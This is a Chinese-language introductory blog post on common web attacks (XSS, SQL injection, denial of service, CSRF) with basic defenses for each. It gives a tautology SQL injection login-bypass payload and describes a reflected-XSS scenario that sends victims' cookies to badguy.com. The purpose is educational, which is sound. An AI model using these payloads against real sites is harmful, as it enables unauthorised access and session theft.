資訊專欄INFORMATION COLUMN
摘要:根據年的報告看一下都有哪些常見攻擊。來自安全測試之有這么個網頁,查詢的結果和查詢的關鍵字都會顯示到網頁上。安全是個大領域,暫時先到這里,以后有時間再總結寫別的。安全測試之拒絕服務攻擊知乎討論淺談攻擊方式
搞web離不開security這個話題,之前關注的也不多只是聽說一些名詞什么的。是時候好好看看這些安全問題了。根據Cenzic 2012年的報告看一下都有哪些常見攻擊。
37% Cross-site scripting 16% SQL injection 5% Path disclosure 5% Denial-of-service attack 4% Arbitrary code execution 4% Memory corruption 4% Cross-site request forgery 3% Data breach (information disclosure) 3% Arbitrary file inclusion 2% Local file inclusion 1% Remote file inclusion 1% Buffer overflow 15% Other, including code injection (PHP/JavaScript), etc.
排好隊先看幾個我接觸過的。
cross site script (XSS) 什么是XSSXSS指攻擊者在網頁中嵌入客戶端腳本(例如JavaScript), 用戶瀏覽網頁就會觸發惡意腳本執行。 比如獲取用戶的Cookie,導航到惡意網站,攜帶木馬等。如何把惡意代碼嵌入到用戶要訪問的網頁中,攻擊者挖空心思各出奇招了。一般會有這兩類方式:
Reflected (non-persistent)
反射攻擊,就是惡意代碼藏在本地,表現方式可能是一個惡意鏈接,你點擊后給server GET/POST這個request,server如果沒有恰當的處理這個請求,惡意代碼返回給用戶瀏覽器并執行。舉個例子就比較明白了。來自Web安全測試之XSS
有這么個網頁,查詢的結果和查詢的關鍵字都會顯示到網頁上。
Results for <%Reequest.QueryString("term")%> ...
Tom 先建立一個網站http://badguy.com, 用來接收“偷”來的信息。然后Tom 構造一個惡意的url(如下), 通過某種方式(郵件,QQ)發給Monica
http://victim.com/search.asp?term=
Monica點擊了這個URL, 嵌入在URL中的惡意Javascript代碼就會在Monica的瀏覽器中執行. 那么Monica在victim.com網站的cookie, 就會被發送到badguy網站中。這樣Monica在victim.com 的信息就被Tom盜了.
XSS防治之道文本輸入做中對js關鍵字做編碼,讓回給用戶瀏覽器的js不可執行
瀏覽器的同源策略,瀏覽器只允許訪問cookie的IP+port必須同最初創建cookie的ip+port相同
web app或者瀏覽器提供“禁用script”的選項
SQL injection 什么是SQL 注入SQL注入攻擊是黑客對數據庫進行攻擊的常用手段之一。相當大一部分程序員在編寫代碼的時候,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段數據庫查詢代碼,根據程序返回的結果,獲得某些他想得知的數據,這就是所謂的SQL Injection,即SQL注入。
某個網站的登錄驗證的SQL查詢代碼為:
strSQL = "SELECT * FROM users WHERE (name = "" + userName + "") and (pw = ""+ passWord +"");"
惡意填入
userName = "1" OR "1"="1"; 與passWord = "1" OR "1"="1";
將導致原本的SQL字符串被填為
strSQL = "SELECT * FROM users WHERE (name = "1" OR "1"="1") and (pw = "1" OR "1"="1");"
也就是實際上運行的SQL命令會變成下面這樣的
strSQL = "SELECT * FROM users;"
因此達到無賬號密碼,亦可登錄網站。所以SQL注入攻擊被俗稱為黑客的填空游戲。
SQL injection 防治之道從安全技術手段上來說,可以通過數據庫防火墻實現對SQL注入攻擊的防范,因為SQL注入攻擊往往是通過應用程序來進攻,可以使用虛擬補丁技術實現對注入攻擊的SQL特征識別,實現實時攻擊阻斷。
Denial-of-service顧名思義,拒絕服務攻擊就是想盡辦法讓你的服務器無法正常提供服務。方法太多了,但是仔細研究攻擊的模式,可以分為以下四種情況:
Cross-site request forgerya.消耗包括網絡帶寬、存儲空間、CPU 時間等資源;
b.破壞或者更改配置信息;
C.物理破壞或者改變網絡部件;
d.利用服務程序中的處理錯誤使服務失效
如果攻擊者使用分布在各地的PC來發起攻擊,這就是DDOS了,distributed DOS。有關如何防治DDOS,沒有太好的辦法,轉一個知乎上的討論,知乎討論DDOS
跨站請求偽造也被稱為 one-click attack 或者 session riding,通常縮寫為 CSRF 或者 XSRF, 是一種挾制用戶在當前已登錄的Web應用程序上執行非本意的操作的攻擊方法。跟跨網站指令碼(XSS)相比,XSS 利用的是用戶對指定網站的信任,CSRF 利用的是網站對用戶網頁瀏覽器的信任。你這可以這么理解CSRF攻擊:攻擊者盜用了你的身份,以你的名義發送惡意請求。淺談CSRF攻擊方式 有個不錯的例子描述,一目了然。
防御 CSRF 攻擊策略驗證 HTTP Referer 字段
HTTP頭里有Referer字段,這個字段用以標識請求來源地址。在處理敏感信息時,通常來說Referer字段應和請求的地址位于同一域名下。比如銀行頁面上的轉賬鏈接http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName,Referer字段地址通常應該位于www.examplebank.com之下,也就是這個鏈接必須是這個網站域名下面的網頁提供的。而如果是CSRF攻擊的請求一般是其他惡意網站的網頁,瀏覽器填Referer字段時會填惡意網站的地址,不會位于www.examplebank.com之下,這時候server端可以識別出惡意訪問。
在請求地址中添加 token 并驗證
只要server端可以識別出發來的請求不是來自server自己提供的網頁上的鏈接,server就能識別這不是我允許的請求,肯能是CSRF偽裝的請求。如果標識這些敏感請求呢?server可以在這個鏈接旁邊附帶一個隨機碼(csrf token),如果你是正常訪問自然可以帶上來正確的csrf token,否則就是其他惡意訪問了。
安全是個大領域,暫時先到這里,以后有時間再總結寫別的。
Web_application_security
Web Application Security
Web安全測試之XSS
拒絕服務攻擊
知乎討論DDOS
淺談CSRF攻擊方式
文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。
轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/11166.html
摘要:咱媽說別亂點鏈接之淺談攻擊閱讀掘金作者馬達編輯迷鹿馬達,精通開發開發,擅長接口設計以及平臺化建設,獨自主導過多個產品。一題目購物應用分環境要求安全學習資料匯總掘金安全學習資料匯總安全學習網站收集 咱媽說別亂點鏈接之淺談 CSRF 攻擊 - 閱讀 - 掘金作者 | 馬達編輯 | 迷鹿 馬達, 精通PHP開發、Web開發,擅長api接口設計以及平臺化建設,獨自主導過多個Web產品。目前就職...
摘要:網絡黑白一書所抄襲的文章列表這本書實在是垃圾,一是因為它的互聯網上的文章拼湊而成的,二是因為拼湊水平太差,連表述都一模一樣,還抄得前言不搭后語,三是因為內容全都是大量的科普,不涉及技術也沒有干貨。 《網絡黑白》一書所抄襲的文章列表 這本書實在是垃圾,一是因為它的互聯網上的文章拼湊而成的,二是因為拼湊水平太差,連表述都一模一樣,還抄得前言不搭后語,三是因為內容全都是大量的科普,不涉及技術...
摘要:想閱讀更多優質原創文章請猛戳博客一,跨站腳本攻擊,因為縮寫和重疊,所以只能叫。跨站腳本攻擊是指通過存在安全漏洞的網站注冊用戶的瀏覽器內運行非法的標簽或進行的一種攻擊。跨站腳本攻擊有可能造成以下影響利用虛假輸入表單騙取用戶個人信息。 前言 在互聯網時代,數據安全與個人隱私受到了前所未有的挑戰,各種新奇的攻擊技術層出不窮。如何才能更好地保護我們的數據?本文主要側重于分析幾種常見的攻擊的類型...
摘要:摘要今年的先知白帽大會,與會者將能夠親身感受到非常多有趣的技術議題,如在國際賽事中屢奪佳績的團隊,其隊長將親臨現場,分享穿針引線般的漏洞利用藝術。從數據視角探索安全威脅阿里云安全工程師議題解讀本議題討論了數據為安全人員思維方式帶來的變化。 摘要: 今年的先知白帽大會,與會者將能夠親身感受到非常多有趣的技術議題,如HITCON在國際賽事中屢奪佳績的CTF團隊,其隊長Orange將親臨現場...
閱讀 1932·2021-11-23 09:51
閱讀 1249·2019-08-30 15:55
閱讀 1620·2019-08-30 15:44
閱讀 764·2019-08-30 14:11
閱讀 1148·2019-08-30 14:10
閱讀 920·2019-08-30 13:52
閱讀 2633·2019-08-30 12:50
閱讀 618·2019-08-29 15:04
